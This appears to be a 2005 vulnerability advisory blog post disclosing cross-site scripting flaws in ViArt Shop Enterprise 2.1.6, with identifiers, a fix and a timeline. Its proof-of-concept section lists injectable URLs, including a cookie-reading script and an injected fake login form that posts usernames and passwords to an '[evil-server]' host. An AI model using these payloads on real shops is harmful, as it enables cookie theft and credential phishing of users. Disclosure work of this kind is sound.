ViArt Shop Enterprise multiple variable XSS

Friday, April 29, 2005
#########################################################
ViArt Shop Enterprise multiple variable XSS
vendor: http://www.codetosell.com
advisory:http://lostmon.blogspot.com/2005/04/
viart-shop-enterprise-multiple.html
vendor informed: yes exploit available:yes
OSVDB ID:15951, 15952 ,15953, 15954 , 15955 , 15956 , 15957, 15958
Securitytracker:1013853
Secunia:SA15181
BID:13462
#########################################################

ViArt Shop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple variables upon submission to the multiple scripts.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.

##########
versions:
##########

ViArt Shop Enterprise v.2.1.6 afected
also is posible prior versions are afected too.

##########
Solution:
##########

Update to version ViArt Shop version 2.1.8

#########
timeline:
#########

discovered : 25 april 2005
vendor notify :28 april 2005
vendor response :18-10-2005
vendor fix:05-05-2005
disclosure:29 april 2005

########## Proof of concept ##############
############
basket.php
###########

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0
[XSS-CODE]%26search_string%3Dss%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3D[XSS-CODE]%26search_string%3Dss%26
search_category_id%3D%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id
%3D0%26search_string%3Dss%26search_string%3Dss%26
search_category_id[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26
search_category_id%3D[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26search_category_id%3D
%26search_category_id%3D[XSS-CODE]

###########
forum.php
###########

http://[victim]/forum_new_thread.php

form fields nickname,email,topic and message are vulnerables to XSS

for exploiting email you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com

http://[victim]/forum_thread.php?thread_id=2

wen reply to a post nickname and message fields are vulnerable to XSS

all of this codes are executed wen a user view the forum or wen admin
look in "admin panel" for "forum threads" in forum menu

###########
page.php
###########

http://[victim]/page.php?page=about%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/page.php?page=%3Cp%3Ean%20eror%20was%20send
%20to%20webmaster,%20please%20insert%20your%20username%20
and%20password%20,%20and%20continue%20shopping%20%3Cform
%20action=%22http://[evil-server]/save.php%22%20method=%22
post%22%3EUsername:%3Cinput%20aame=%22username%22%20type
=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3C
input%20name=%22password%22%20type=%22text%22%20maxlength
=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=
%22submit%22%20value=%22Login%22%3E%3C/form%3E


############
reviews.php
############

http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[victim]/reviews.php?category_id=0[XSS-CODE]&item_id=4

http://[victim]/reviews.php?filter=0&item_id=4
[XSS-CODE]&category_id=0

#################
products.php
#################

http://[victim]/product_details.php?item_id=4
&category_id=0[XSS-CODE]


http://[victim]/products.php?category_id=13[XSS-CODE]

http://[victim]/products.php?category_id=0&search_string=
[XSS-CODE]&search_category_id=

##################
news_view.php
##################

http://[victim]/news_view.php?news_id=3&rp=
news.php[XSS-CODE]&page=1

http://[victim]/news_view.php?news_id=3&rp=
news.php&page=1[XSS-CODE]

################# end #########################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...